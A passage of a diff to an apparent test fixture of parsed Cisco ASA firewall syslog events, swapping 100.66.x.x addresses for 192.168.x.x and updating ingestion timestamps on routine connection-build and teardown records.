"2021-07-19T09:06:25.094949863Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:32:20.604364100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094951605Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:32:20.604369400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094953361Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:32:20.604374800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094955103Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:32:20.604380200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094957912Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:32:20.604385600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094959670Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:32:20.604390900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094961399Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:32:20.604396300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094963132Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:32:20.604401900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094964864Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:32:20.604405700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094966580Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:32:20.604410Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094968386Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:32:20.604414900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094970138Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:32:20.604419500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094971864Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:32:20.604423Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094973636Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:32:20.604427300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094975439Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:32:20.604432700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094977190Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:32:20.604438Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094978932Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:32:20.604441500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094980674Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:32:20.604445300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094982424Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:32:20.604448600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094984207Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:32:20.604452800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094985977Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:32:20.604458200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094987736Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:32:20.604463600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094989496Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:32:20.604468900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094991241Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:32:20.604474300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094992964Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:32:20.604479600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094994987Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:32:20.604484900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094996765Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:32:20.604490400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094998495Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604495800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095000230Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:32:20.604501200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic 